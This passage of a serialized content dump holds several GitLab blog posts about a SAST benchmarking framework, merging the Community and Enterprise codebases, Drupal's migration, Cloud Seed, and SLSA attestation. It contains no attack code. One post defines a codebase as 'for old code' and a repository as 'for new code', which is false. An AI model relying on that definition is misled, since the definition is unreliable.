_TN_           |\n| -        | X        | _FN_           |\n| X        | -        | _FP_           |\n| X        | X        | _TP_           |\n\nThe `classification` column in the table above shows that a _TP_ is a\nvulnerability existing in both baseline and generated report; similarly, an\n_FP_ is a vulnerability detected by an analyzer without a corresponding\nbaseline entry, while an _FN_ is a vulnerability present in the baseline but\nnot detected by an analyzer. Note, that _TN_ is practically not relevant for\nour use-case since the analyzers we are looking at only report unsafe,\nvulnerable cases instead of safe, non-vulnerable cases. \n\nAt the moment, the `evaluator` tool computes the metrics below:\n- Precision: _P_ = _TP_ /( _TP_ + _FP_ )\n- Recall: _R_ = _TP_ / ( _TP_ + _FN_ )\n- F-Score: _F_ = 2 * ( _P_ * _R_ ) / ( _P_ + _R_ ) \n- Jaccard-Index: _J_ = _TP_ / ( _TP_ + _FP_ + _FN_ )\n\nA higher precision indicates that an analyzer is less noisy due to the low(er)\nnumber of _FPs_. Hence, a high precision leads to a reduction of auditing effort\nof irrelevant findings. A high recall represents an analyzer's detection\ncapacity. F-Score is a combined measure so that precision and recall can be\ncondensed to a single number. The Jaccard-Index is a single value to capture\nthe similarity between analyzer and baseline.\n\nThe [evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\nsupports the addition of custom metrics via a simple call-back mechanism; this\nenables us to add support more metrics in the future that help us to gain\nadditional or new insights with regards to the efficacy of our analyzers.\n\n### Framework Properties\n\nIn principle, the implemented benchmarking framework is language-agnostic: new\nanalyzers and baselines can be plugged-in as long as they adhere to the\n[security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format). \n\nEstablishing baselines is laborious since it requires (cross-)validation, \ntrying out attacks on the running baseline application and\ncode auditing.\n\nFor the GSoC project, we established baselines for the applications below\ncovering Java ([Spring](https://spring.io/)) and Python\n([Flask](https://flask.palletsprojects.com/)) as they are [ranking high in the most used languages and frameworks](https://survey.stackoverflow.co/2022/#technology-most-popular-technologies). \nFor a benchmark application to have practical utility, it is important that the\napplication itself is based on technology, including programming languages and\nframeworks, that are used in the industry.\n\nFor both of these applications, the baseline/expectations have been collected,\nverified and are publicly availabe: \n- [WebGoat](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/WebGoat/-/tree/baselines). \n  WebGoat is a deliberately insecure Web application used to teach security vulnerabilities.\n  We chose this as baseline application because it is often used as a benchmark\n  app in the Java world and it is based on [Spring](https://spring.io/) which is\n  one of the most popular frameworks in the Java world. \n- [vuln-flask-web-app](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/vuln-flask-web-app/-/tree/report) Like WebGoat, this application is deliberately insecure. `vuln-flask-web-app` covers both Python and [Flask](https://flask.palletsprojects.com/en/2.2.x/), one of the most popular web frameworks in the Python world.\n\n## Conclusion\n\nThis GSoC project was a first step towards building a FOSS benchmarking\nframework that helps the community to test their own tools and to build up a\nrelevant suite of baselines covering various languages and frameworks. With the\nhelp of the community, we will continue adding more baselines to the\nbenchmarking framework in the future to cover more languages and frameworks.\n\nIf you found the project interesting, you might want to check out the following repositories:\n\n- [evaluator](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator)\n- [WebGoat baseline](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/WebGoat/-/tree/baselines)\n- [Vulnerable Flask Web App baseline](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/baselines/vuln-flask-web-app/-/tree/report)\n- [Example of downstream pipeline triggering evaluator](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator-downstream)\n\nCover image by [Maxim Hopman](https://unsplash.com/@nampoh) on [Unsplash](https://unsplash.com/photos/fiXLQXAhCfk)\n{: .note}\n",[779,780,9],"collaboration","google",{"slug":782,"featured":6,"template":689},"a-benchmarking-framework-for-sast","content:en-us:blog:a-benchmarking-framework-for-sast.yml","A Benchmarking Framework For Sast","en-us/blog/a-benchmarking-framework-for-sast.yml","en-us/blog/a-benchmarking-framework-for-sast",{"_path":788,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":789,"content":795,"config":804,"_id":806,"_type":14,"title":807,"_source":16,"_file":808,"_stem":809,"_extension":19},"/en-us/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition",{"title":790,"description":791,"ogTitle":790,"ogDescription":791,"noIndex":6,"ogImage":792,"ogUrl":793,"ogSiteName":673,"ogType":674,"canonicalUrls":793,"schema":794},"Why GitLab uses one codebase for Community & Enterprise","Dive into our decision to switch GitLab over to a single codebase as we review some of the benefits and challenges. Learn more here!","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671631/Blog/Hero%20Images/merge-ce-ee-codebases.jpg","https://about.gitlab.com/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Update: Why GitLab uses a single codebase for Community and Enterprise editions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Yorick Peterse\"}],\n        \"datePublished\": \"2019-08-23\",\n      }",{"title":796,"description":791,"authors":797,"heroImage":792,"date":799,"body":800,"category":801,"tags":802},"Update: Why GitLab uses a single codebase for Community and Enterprise editions",[798],"Yorick Peterse","2019-08-23","\n\nIn [\"GitLab might move to a single Rails\ncodebase\"](/blog/merging-ce-and-ee-codebases/), we announced that GitLab\nmight move to using a single codebase for GitLab Community Edition (CE) and\nGitLab Enterprise Edition (EE). Since then we have decided to continue moving\ntoward a single codebase. In this article, I highlight some of the challenges,\nrequired work, and steps remaining to complete the switch.\n\n## What is codebase?\n\nWhat is a codebase, I hear you ask? Well, a codebase (which is at times spelled as code base) is essentially the entire collection of source \ncode that is required for a program or application to function properly. This can include things like configuration \nfiles, libraries, and other dependencies, in addition to the actual application code. The codebase is \ntypically stored in a single location, often within a source control repository, where multiple developers \ncan access and make contributions to it.\n\nMultiple developers can use and contribute to a single codebase, which is generally retained within a source control \nrepository. As such, it can assist with the backup and versioning of overlapping code \nmodifications/alterations. This can be especially important for larger projects that require a lot of coordination \nand communication between team members. With everyone working from the same codebase, it becomes easier \nto ensure that changes are made consistently and in a way that does not break the application.\n\n## Why GitLab uses a single codebase?\n\nPrior to using a single codebase, for years CE and EE used two different repositories for the Rails application.\nBy using separate repositories we could separate proprietary code from code that\nis free software. On the surface this seems like a good idea for different\nreasons (e.g., licensing), but over the years the drawbacks\nbegan to outweigh the benefits.\n\nWe [mention some of these drawbacks in a previous\narticle](/blog/merging-ce-and-ee-codebases/), but more or less they all\ncome down to the same core problem: It made the development process more complex\nthan necessary. For example, we ended up with around 150 merge requests spread\nacross CE and EE for a security release from several months ago. While the\nprocess of merging these merge requests is automated, we ran into a variety of\nissues (e.g. failing tests) that required manual intervention. We could have\nreduced the number of merge requests by half if we used a single repository,\ncreating less work for developers and release managers.\n\nToward the end of 2018, I felt that we were running out of time and had to do\nsomething about the separation of CE and EE. We had always tried to avoid\nmerging the two repositories due to the complexity and time involved, but it\nstarted to become more and more clear we had no other option. [Marin\nJankovski](/company/team/#maxlazio), Delivery engineering manager, and I made a\nplan to merge the two repositories. Marin wrote a [design\ndocument](/handbook/engineering/infrastructure/library/merge-ce-ee-codebases/)\nthat outlined the details of it all. The design document showed what challenges\nwe faced, and gathered the critical support required for the largest engineering\nprojects at GitLab to date.\n\n## What is the difference between a codebase and a repository?\n\nThe basic difference between a codebase and a repository is that one is for old code and one is for new code. \n\nBut more specifically...\n\nA codebase can be either a public or private place to store large amounts of code that is actively being iterated on in a version control system, and typically stored in a source control repository in a version control system.\n\nA source code repository is where an archived version of the code being worked on is kept. It’s also a place to house documentation, notes, web pages, and other items in your repository. \n \n## Working toward a single codebase\n\nMoving to a single codebase is not something we can do overnight for a project\nthe size of GitLab. Workflows must be adapted, developers need to adjust to the\nnew setup, and automation requires extensive changes.\n\nOne of the biggest challenges from an engineering perspective was to come up\nwith a way to transparently remove proprietary code from GitLab when building a\nCE release. A naive approach might involve a script that removes known bits of\nproprietary code. While this might work for small projects that don't change\noften, this was not going to work for a project the size of GitLab.\n\nRuby provides us with a solution to this problem. In Ruby, you can create a\nmodule and inject it into another module or class. Once injected, the\nfunctionality of the module becomes available to the target module or class.\nThis is best illustrated with a simple example:\n\n```ruby\nclass Person\n  def initialize(name)\n    @name = name\n  end\n\n  def name\n    @name\n  end\nend\n\nmodule Greet\n  def greet\n    \"Hello #{name}\"\n  end\nend\n\nPerson.include(Greet)\n\nalice = Person.new('Alice')\n\nalice.greet # => \"Hello Alice\"\n```\n\nHere we define a class `Person`, followed by a module that is used to create a\nmessage greeting a person. Next, we include it into the `Person` class, at which\npoint we can use the module's methods for instances of the `Person` class. The\nresult is the message \"Hello Alice.\"\n\nWhile this example is not exciting, using a setup like this allows us to\nmove proprietary code to separate modules, and inject these modules when GitLab\nEE is used. For GitLab CE, we would remove these modules, and the code injecting\nthese modules would have to disable itself transparently and automatically.\n\nGitLab EE has been using this setup since late 2016 with all EE modules residing\nin a separate \"ee\" directory, but in a limited number of places. This meant that\nin some places EE and CE code got mixed together, while in other places the two\nare separate. For example, we had code like this:\n\n```diff\n def lfs_upload_access?\n   return false unless project.lfs_enabled?\n   return false unless has_authentication_ability?(:push_code)\n+  return false if project.above_size_limit? || objects_exceed_repo_limit?\n\n   lfs_deploy_token? || can?(user, :push_code, project)\n end\n```\n\nHere EE added a line into an existing method without using a separate module,\nmaking it difficult to remove the EE-specific code when for CE.\n\nBefore we could move to a single codebase, we had to separate EE-specific code from code shared between CE and EE. Due to the amount\nof work necessary, we divided the work into two departments: backend and\nfrontend. For every department we created issues outlining the work to do for\nthe various parts of the codebase. We even included the [exact lines of code\nthat had to change directly in the created\nissues](https://gitlab.com/gitlab-org/gitlab-ee/issues/9506), making it simple\nto see what one had to do. Each department also had an engineer assigned as the\nlead engineer, responsible for taking on the most difficult challenges.  [Filipa\nLacerda](/company/team/#FilipaLacerda), senior frontend engineer of Verify (CI)\nand Delivery, was in charge of frontend code. [As the Delivery backend engineer,\nI myself](/company/team/#yorickpeterse) was in charge of backend code.\n\nSome changes were small and took a short amount of time, with others were big\nand took weeks. One of my big challenges was to make sure CE and EE [use the same\ndatabase schema](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/26940),\nchanging just under 24,000 lines of code over a two-month period.\n\n>In total the work involved 55\ndifferent engineers submitting more than 600 merge requests, closing just under\n400 issues, and changing nearly 1.5 million lines of code\n\nFilipa spent a lot of time creating 168 frontend issues outlining specific tasks\nas well as submitting 124 merge requests to address the majority of these\nissues. Resolving some of these issues required getting rid of some\ntechnical debt first, such as [breaking up large chunks of code into smaller\nchunks](https://gitlab.com/gitlab-org/gitlab-ee/merge_requests/14592), and\ncoming up with a way [to create EE-specific Vue.js\ntemplates](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/25650).\n\nWhile Filipa and I took on the biggest challenges, in total the work involved 55\ndifferent engineers submitting more than 600 merge requests, closing just under\n400 issues, and changing nearly 1.5 million lines of code.\n\n## Moving toward a single codebase\n\nWith most of the work done, we could start looking into what project setup we\nwould use for a single codebase. We came up with three different approaches:\n\n### 1. Single codebase: moving all development into gitlab-ce\n\nAll code and development is moved into the gitlab-ce repository. The gitlab-ee\nrepository is archived, and a separate repository is set up as a mirror of\ngitlab-ce, called gitlab-foss. Proprietary code is removed from this mirror\nautomatically.\n\nSince most of GitLab's development takes place in the current gitlab-ce\nrepository, this setup would reduce the number of issues to move as well as merge requests to close. A downside of this approach is that clones of\nthe gitlab-ce repository will include proprietary code.\n\n### 2. Single codebase: moving all development into gitlab-ee\n\nAll code and development is moved into the gitlab-ee repository. The gitlab-ce\nrepository remains as is in terms of code, and will become a mirror of gitlab-ee. Like\nthe first option, proprietary code is removed from this mirror automatically.\n\nThis setup means that users cloning gitlab-ce don't end up with proprietary code\nin their copy of gitlab-ce.\n\n### 3. Single codebase: moving all development into a new repository\n\nWe set up an entirely new repository called \"gitlab,\" and move all code and\ndevelopment into this repository. The gitlab-ce and gitlab-ee repositories will\nbecome read-only. A mirror is set up (called \"gitlab-foss\") that mirrors the new\n\"gitlab\" repository, without including proprietary code.\n\n## Deciding which single codebase approach to take\n\n[Having evaluated all the benefits and\ndrawbacks](https://www.youtube.com/watch?v=LV_AHeL5sIo), we decided to go with\noption two: move development into gitlab-ee. This approach has several benefits:\n\n1. The code of the gitlab-ce repository remains as is, and won't include any\n   proprietary code.\n1. We do not need a separate mirror repository that does not include proprietary\n   code. Instead, we rename the gitlab-ce repository to \"gitlab-foss.\" We are\n   renaming the repository since having \"gitlab\" and \"gitlab-ce\" as project\n   names could be confusing.\n1. Users building CE from source don't end up with proprietary code in their\n   copy of the gitlab-ce repository.\n1. We keep the Git logs of both gitlab-ce and gitlab-ee, instead of losing the\n   logs (this depends a bit on how we'd move repositories around).\n1. It requires the least amount of changes to our workflow and tooling.\n1. Using a single project and issue tracker for both CE and EE makes it easier\n   to search for issues.\n\nIssues created in the gitlab-ce project will move to the gitlab-ee project,\nwhich we will rename to just \"gitlab\" (or \"gitlab-org/gitlab\" if you include the\ngroup name). This project then becomes the single source of truth, and is used\nfor creating issues for both the CE and EE distributions.\n\nMoving merge requests across projects is not possible, so we will close any open\nmerge requests. Authors of these merge requests will have to resubmit them to\nthe \"gitlab\" (called \"gitlab-ee\" before the rename) project.\n\nWhen moving issues or closing merge requests, a bot will also post a comment\nexplaining why this is done, what steps the author of a merge request has to\ntake, and where one might find more information about these procedures.\n\nPrior to the single codebase setup, GitLab community contributions would be submitted\nto the gitlab-ce repository. In the single codebase, contributions are instead\nsubmitted to the new gitlab repository (\"gitlab-org/gitlab\"). EE-specific code\nresides in a \"ee\" directory in the repository. Code outside of this directory\nwill be free and open source software, using the same license as the gitlab-ce\nrepository currently uses. This means that as long as you do not change anything\nin this \"ee\" directory, the only change for GitLab community contributions is the use\nof a different repository.\n\nOur current plan is to have a single codebase the first week of September.  GitLab 12.3 will be the first release based on a single codebase.\n\nUsers that clone GitLab EE and/or GitLab CE from source should update their Git\nremote URLs after the projects are renamed. This is not strictly necessary as\nGitLab will redirect Git operations to the new repository. For users of our\nOmnibus packages and Docker images nothing changes.\n\nThose interested in learning more about what went on behind the scenes can refer\nto the following resources:\n\n* [A video in which we discusses the benefits and drawbacks of the various\n  project setups](https://www.youtube.com/watch?v=LV_AHeL5sIo)\n* [The issue detailing the remaining work to do](https://gitlab.com/gitlab-org/gitlab-ee/issues/13304)\n* [A list of all the single codebase merge requests](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=merged&label_name%5B%5D=single%20codebase)\n\nCover image from [Unsplash](https://images.unsplash.com/photo-1512217536414-d92543c79ca1)\n{: .note}\n","engineering",[803,9],"inside GitLab",{"slug":805,"featured":6,"template":689},"a-single-codebase-for-gitlab-community-and-enterprise-edition","content:en-us:blog:a-single-codebase-for-gitlab-community-and-enterprise-edition.yml","A Single Codebase For Gitlab Community And Enterprise Edition","en-us/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition.yml","en-us/blog/a-single-codebase-for-gitlab-community-and-enterprise-edition",{"_path":811,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":812,"content":818,"config":824,"_id":826,"_type":14,"title":827,"_source":16,"_file":828,"_stem":829,"_extension":19},"/en-us/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab",{"title":813,"description":814,"ogTitle":813,"ogDescription":814,"noIndex":6,"ogImage":815,"ogUrl":816,"ogSiteName":673,"ogType":674,"canonicalUrls":816,"schema":817},"A visual prototype of Drupal.org's GitLab integration","Guest author Tim Lehnen shares a visual preview of free and open source platform Drupal's upcoming integration with GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749671386/Blog/Hero%20Images/drupal-cover.png","https://about.gitlab.com/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A visual prototype of Drupal.org's GitLab integration\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Tim Lehnen\"}],\n        \"datePublished\": \"2018-12-19\",\n      }",{"title":813,"description":814,"authors":819,"heroImage":815,"date":821,"body":822,"category":10,"tags":823},[820],"Tim Lehnen","2018-12-19","\nAt [Drupal Europe](https://www.drupaleurope.org) in September, we were very pleased that project founder [Dries Buytaert](https://dri.es) highlighted a visual prototype of our upcoming integration with GitLab in his keynote. This follows our announcement that we'd be [moving to GitLab](/blog/drupal-moves-to-gitlab/) back in August.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/q06taaJPGDw?rel=0&amp;showinfo=0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nThis video outlines the migration phases that we discussed [in the announcement of our partnership with GitLab](https://www.drupal.org/drupalorg/blog/developer-tools-initiative-part-5-gitlab-partnership). Our migration window for Phase 1 is targeted for the first weeks of January, and we hope Phase 2 to be completed shortly in the beginning of 2019.\n\n## So what has it taken to get this integration working between September and now?\n\nPrimarily, lots of collaboration with the GitLab team. We've worked with their excellent engineering staff to resolve a number of issues that affect our integration, including:\n\n- [git merge-base web API](https://gitlab.com/gitlab-org/gitlab-ce/issues/49850)\n- [Add ability to confirm a user’s email address via \"Add email for user\" API](https://gitlab.com/gitlab-org/gitlab-ce/issues/50876)\n- [Allow configuration of the display URL for clone instructions](https://gitlab.com/gitlab-org/gitlab-ce/issues/49698)\n- [Ability to hide User's Email Address from GitLab UI](https://gitlab.com/gitlab-org/gitlab-ce/issues/24221)\n- [Allow ability for developer role to delete tags](https://gitlab.com/gitlab-org/gitlab-ce/issues/52954)\n- [Set GL_REPOSITORY in update hooks for API-initiated requests](https://gitlab.com/gitlab-org/gitaly/issues/1402)\n- [Deduplication of Git objects, reducing disk space of repository forks](https://gitlab.com/gitlab-org/gitlab-ce/issues/23029)\n\nOn the Drupal.org side:\n\n - We've built a [`versioncontrol_gitlab` module](https://www.drupal.org/project/versioncontrol_gitlab), which extends our use of the [`versioncontrol_git` module](https://www.drupal.org/project/versioncontrol_git) to orchestrate our integration.\n - We've also been cleaning up our data, to ensure there are no namespace conflicts between existing Drupal projects and users, and the reserved terms used by GitLab.\n\nWe're now in the midst of serious migration testing: testing and re-testing the process in our staging environment, putting load testing in place to stress test our integration, and doing user-validation testing to ensure that the workflows affected by this integration are working as expected.\n\nAll in all, we're thrilled with the progress, and very thankful for GitLab's close collaboration. We're excited to be moving the Drupal project to its next generation tooling soon. Once Phase 1 of our migration is complete, it'll be time for Phase 2 and our community will start seeing some tremendous improvements in efficiency and collaboration.\n\n## How can people get involved in Drupal?\n\nThe Drupal community has a comprehensive [Getting Involved Guide](https://www.drupal.org/getting-involved-guide) that can help individuals find their place in the Drupal community. There are also meetups and conferences around the world that are a great way to start your Drupal journey. In particular, [DrupalCon will be coming to Seattle from Apr. 8-12, 2019](https://events.drupal.org/seattle2019).\n\nThe Drupal project's motto has always been \"Come for the code, stay for the community\" and 17 years later, that's a sentiment we still believe in.\n\n### About the guest author\n\nTim Lehnen is the Executive Director at the [Drupal Association](https://www.drupal.org/association).\n\n_This guest post was originally published [on the Drupal blog](https://www.drupal.org/drupalorg/blog/a-visual-prototype-of-drupalorgs-integration-with-gitlab)._\n",[9,267,231],{"slug":825,"featured":6,"template":689},"a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab","content:en-us:blog:a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab.yml","A Visual Prototype Of Drupal Dot Orgs Integration With Gitlab","en-us/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab.yml","en-us/blog/a-visual-prototype-of-drupal-dot-orgs-integration-with-gitlab",{"_path":831,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":832,"content":838,"config":846,"_id":848,"_type":14,"title":849,"_source":16,"_file":850,"_stem":851,"_extension":19},"/en-us/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud",{"title":833,"description":834,"ogTitle":833,"ogDescription":834,"noIndex":6,"ogImage":835,"ogUrl":836,"ogSiteName":673,"ogType":674,"canonicalUrls":836,"schema":837},"GitLab & Google Cloud partnership accelerates cloud adoption","Learn how Cloud Seed came about and how it will help speed app modernization.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665811/Blog/Hero%20Images/daytime-clouds.jpg","https://about.gitlab.com/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Accelerate cloud adoption with GitLab's open source partnership with Google Cloud\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sri Rangan\"}],\n        \"datePublished\": \"2022-10-11\",\n      }",{"title":839,"description":834,"authors":840,"heroImage":835,"date":842,"body":843,"category":10,"tags":844},"Accelerate cloud adoption with GitLab's open source partnership with Google Cloud",[841],"Sri Rangan","2022-10-11","\nSince December 2021, GitLab Incubation has partnered with Google Cloud to develop\nsolutions that will help customers address one of their biggest business requirements: accelerating cloud adoption.\n\nWe are thrilled to announce the release of Cloud Seed at Google Cloud Next 2022,\nand we are even more excited to follow up with our community. Cloud Seed is an open\nsource partnership between GitLab and Google Cloud to accelerate cloud adoption and\napp modernization.\n\nThe origins of Cloud Seed date back to late 2020 when I worked closely with GitLab co-founder and CEO [Sid Sijbrandij]( /company/team/#sytses) on an experiment called “5 Minute Production\". Our focus was to improve developer experience while consuming cloud services and enabling DevSecOps best practices by default.\n\nFor this, GitLab needed to collaborate with the hyper clouds, and Google Cloud emerged as our natural choice. In this post I’d like to shed light on our collaboration, the results our partnership has achieved, and the positive business outcomes our customers will realize.\n\n## Refining the use case\n\nFirst, we reached out and polled our customers to try and understand their cloud adoption use cases. \n\nWe found the enterprise market segment focused on migrating existing systems to the cloud to achieve their digital transformation targets, while the SMB and startup segment focused on embracing the cloud for greenfield initiatives.\n\n## Cloud Run and Cloud SQL\n\nWhile motivations for enterprise and SMB segments varied, the underlying use case —– deploying web applications to the cloud —– remained the same. Thus, we selected two of the more popular Google Cloud managed services that web applications make use of: [Cloud Run](https://cloud.google.com/run) and [Cloud SQL](https://cloud.google.com/sql).\n\nCloud Run makes it possible to build and deploy scalable containerized apps written in any language (including Go, Python, Java, Node.js, .NET, and Ruby) on a fully managed platform. Meanwhile, Cloud SQL is a fully managed relational database service for MySQL, PostgreSQL, and SQL Server with rich extension collections, configuration flags, and developer ecosystems.\n\n## Open source collaboration\n\nGitLab comes with a rich tradition of [open source](/solutions/open-source/). Our partners at Google Cloud understood and complemented that remarkably, which made for a close collaboration between our two teams. We agreed quite early in the process that all capabilities built within Cloud Seed will be open source and, therefore, available for all GitLab users regardless of their market segment, license tier, or any other consideration.\n\n## Preview environments on Cloud Run\n\nThe Cloud Seed private beta was made available to trusted testers in May 2022, and based on the successful beta program, Preview Environments with GitLab and Cloud Run emerged among the most popular use cases.\n\n**Take a look at Preview Environments on GitLab with Cloud Seed:**\n\n\u003Ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/zDMGCyAgCPY\" title=\"Preview Environments on GitLab with Cloud Seed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen>\u003C/iframe>\n\nMost Git-based development workflows make use of temporary feature branches. In larger teams and organizations, it is required that feature branches are made available for review and testing.\n\nWith Cloud Seed, a Cloud Run deployment pipeline can be generated in less than two minutes that deploys all feature branches to Cloud Run. Given Cloud Run’s free tier, this can be a cost-effective method to deploy and manage preview environments.\n\n## Relational databases with Cloud SQL\n\nAnother common use case, typically in the app migration scenario, is to set up and migrate relational databases in the cloud. Our beta-test users voted for Cloud SQL as their most popular data storage option among a myriad of Google Cloud services.\n\nWith Cloud Seed, traditional relational databases such as Postgres, MySQL, and SQL Server can be spun up from the GitLab web UI. Similar to the Cloud Run workflow described above, these database instances can be made branch, tag, and environment specific. Alternatively, a GitLab project can be spun up for database operations, where Cloud Seed creates a suitable Cloud SQL instance while the Git repository serves as the host for configuration and migration operations.\n\n## Looking ahead\n\nOur purpose is clear: We learn from our users and customers about their use cases and needs, and we build capabilities to support them through their cloud adoption journeys. We are thrilled to announce the release of Cloud Seed at [Google Cloud Next '22](https://cloud.withgoogle.com/next), and we are even more excited to follow up with our community. Connect with us @OpenCloudSeed on Twitter and try out Cloud Seed today at GitLab.com.\n",[282,9,845],"cloud native",{"slug":847,"featured":6,"template":689},"accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud","content:en-us:blog:accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud.yml","Accelerate Cloud Adoption With Gitlabs Open Source Partnership With Google Cloud","en-us/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud.yml","en-us/blog/accelerate-cloud-adoption-with-gitlabs-open-source-partnership-with-google-cloud",{"_path":853,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":854,"content":860,"config":868,"_id":870,"_type":14,"title":871,"_source":16,"_file":872,"_stem":873,"_extension":19},"/en-us/blog/achieve-slsa-level-2-compliance-with-gitlab",{"title":855,"description":856,"ogTitle":855,"ogDescription":856,"noIndex":6,"ogImage":857,"ogUrl":858,"ogSiteName":673,"ogType":674,"canonicalUrls":858,"schema":859},"Achieve SLSA Level 2 compliance with GitLab","Compliance mandates call for controls to prevent software tampering, improve integrity of builds and artifacts, and support attestation. Here's how GitLab can help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667094/Blog/Hero%20Images/container-security.jpg","https://about.gitlab.com/blog/achieve-slsa-level-2-compliance-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Achieve SLSA Level 2 compliance with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sandra Gittlen\"}],\n        \"datePublished\": \"2022-11-30\",\n      }",{"title":855,"description":856,"authors":861,"heroImage":857,"date":863,"body":864,"category":865,"tags":866},[862],"Sandra Gittlen","2022-11-30","\n\nOrganizations are under intense pressure from governing bodies to attest to the fact that their software supply chains have not been tampered with. The industry has come together to create an industry standard, Supply chain Levels for Software Artifacts ([SLSA](https://slsa.dev/)), to guide companies on exactly how to achieve such attestation. GitLab helps organizations comply with SLSA requirements by incorporating attestation capabilities into its DevSecOps platform.\n\n“Although SLSA compliance is relatively new, security-conscious DevOps teams are already adopting its requirements to demonstrate their software is trustworthy,” says [Sam White](https://gitlab.com/sam.white), Group Manager of Product for the [Govern stage](/direction/govern/) at GitLab. \n\nGitLab Federal CTO [Joel Krooswyk](https://gitlab.com/jkrooswyk) agrees. “DevOps teams will need to understand attestation as part of new government regulations around the larger release verification process. Vendors, third-party development and integration providers, and other data-sensitive industries will be required to adhere to published guidance,” he says. “GitLab helps companies across all sectors address these compliance mandates.”\n\n## What is SLSA?\n\nSLSA first launched in 2021 in response to calls for a framework to [secure software supply chains](/blog/the-ultimate-guide-to-software-supply-chain-security/). SLSA provides a checklist of standards and controls to prevent tampering, improve integrity, and secure packages and infrastructure. The goal is for software developers to be able to use best practices to [guarantee the integrity](/blog/securing-the-software-supply-chain-through-automated-attestation/) of each and every artifact, more specifically that the source code users are relying on is the code they are actually using and that the build machine producing the artifacts was secure.\n\nThe SLSA standard has four levels that examine the builds, sources, and dependencies in open source and commercial software. The levels build on one another, growing from simple visibility and being able to generate provenance to providing the highest assurances of build integrity and measures for dependency management.\n\nGitLab’s DevSecOps platform currently supports SLSA Levels 1 and 2. GitLab makes it simple for users to comply with these first two levels, according to White. “Whether you are working on an open source project or developing commercial software, there is no reason not to generate provenance for your code and attest to it. Even if you are just tinkering around, there is no harm in following the SLSA specifications,” he says.\n\n## How to generate artifact metadata with the GitLab Runner\n\nGitLab enables users to generate artifact metadata following the SLSA format for any artifacts that are built on the platform. Because the process happens within the GitLab Runner, without needing third-party software, it prevents the opportunity for any tampering or corruption of the attestation itself.\n\nTo generate an attestation, all that is required is to simply set `RUNNER_GENERATE_ARTIFACTS_METADATA: true` in your `.gitlab-ci.yml` file. You can set the variable globally or on a per-job basis. A CI pipeline then will produce a data.txt file and generate metadata to describe how that file was produced and verify the origin of it or the provenance of it. Users can download this artifact file, which comes as a zip file with the two files inside of it – one is the data.txt and the other is an artifacts metadata .json file.\n\nThe file offers metadata about what was done and it lists out all of the different parameters and input points, including the SHA hash of the file itself as well as the hash of the repository.\n\n“This level of detail enables someone to come in later and get an idea of the steps that were taken in order to produce it as well as information about where it was built so someone can protect their artifacts and reduce the chance of tampering,” White says.\n\n\nFollow the step-by-step instructions here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/MlIdqrDgI8U\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nThe idea of all this, White explains, is to provide a recipe for how the file was built so that if a DevOps team needed to replicate it, they could use those instructions on another machine and get the same build.\n\n## GitLab’s next SLSA step\n\nAs SLSA matures, GitLab plans to [introduce additional features](/direction/supply-chain/), such as the ability to sign the attestation, to guide DevOps teams through SLSA Levels 3 and 4. For instance, users currently can use an external code signer to verify the signing and verify the attestation but the ideal state would be to integrate code signing functionality directly into the platform. GitLab also plans to add capabilities that enable more detailed inspection and validation of attestations from upstream dependencies.\n\n**Disclaimer This blog contains information related to upcoming products, features, and functionality. It is important to note that the information in this blog post is for informational purposes only. Please do not rely on this information for purchasing or planning purposes. As with all projects, the items mentioned in this blog and linked pages are subject to change or delay. The development, release, and timing of any products, features, or functionality remain at the sole discretion of 